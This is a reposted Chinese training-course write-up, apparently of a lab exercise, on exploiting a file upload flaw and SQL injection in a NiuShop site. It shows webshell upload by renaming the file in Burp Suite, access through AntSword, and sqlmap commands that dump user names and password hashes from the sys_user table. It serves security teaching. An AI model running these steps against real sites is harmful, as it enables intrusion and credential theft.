当前位置: 首页> 文旅> 旅游 > 网络安全实训第三天(文件上传、SQL注入漏洞)

网络安全实训第三天(文件上传、SQL注入漏洞)

时间:2025/7/11 7:47:27来源:https://blog.csdn.net/weixin_44512510/article/details/141226265 浏览次数:0次

1 文件上传漏洞

  • 准备一句话文件wjr.php.png,进入到更换头像的界面,使用BP拦截选择文件的请求

在这里插入图片描述

  • 拦截到请求后将wjr.php.png修改为wjr.php,进行转发

在这里插入图片描述

  • 由上图可以查看到上传目录为网站目录下的upload/avator,查看是否上传成功

在这里插入图片描述


  • 使用时间戳在线工具获取到上传文件的名称

在这里插入图片描述

  • 打开中国蚁剑,将上传文件对应的URL输入,并在连接密码处输入cmd,点击添加

在这里插入图片描述


  • 双击进入后可以查看网站目录

在这里插入图片描述


2 SQL注入漏洞

2.1 第一个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 输入id=1 and 1=2进行测试,如果与之前的显示不一样则存在SQL注入漏洞

在这里插入图片描述


2.2 第二个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截刷新界面的操作,获取到请求流量,并保存到wjr.txt中

在这里插入图片描述


  • 打开SQLmap工具,输入命令搜索是否存在注入点
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch

在这里插入图片描述


  • 输入命令获取所有的数据库
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch --dbs

在这里插入图片描述


  • 输入命令获取指定数据库的所有表
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 --tables

在这里插入图片描述


  • 输入命令获取注定数据库中指定表的所有字段
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user --columns

在这里插入图片描述


  • 输入命令获取指定数据库中的指定表的指定字段,这里指定的是user_name和user_password,–dump的作用是获取表中的信息
python sqlmap.py -r “C:\Users\14724\Desktop\wjr.txt” --batch -D niushop_b2c2 -T sys_user -C user_name,user_password --dump

在这里插入图片描述


2.3 第三个注入点

  • 第三个注入点在搜索中
    在这里插入图片描述

  • 使用BP截获搜索请求,将请求保存在wjr.txt中,并使用sqlmap进行测试

在这里插入图片描述


  • 获取到数据库信息

在这里插入图片描述


2.4 第四个注入点

  • 进入存在注入点的网页

在这里插入图片描述


  • 使用BP拦截修改操作,并将流量保存到wjr.txt中

在这里插入图片描述


  • 使用SQLmap获取到数据库信息

在这里插入图片描述

关键字:网络安全实训第三天(文件上传、SQL注入漏洞)

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com

责任编辑: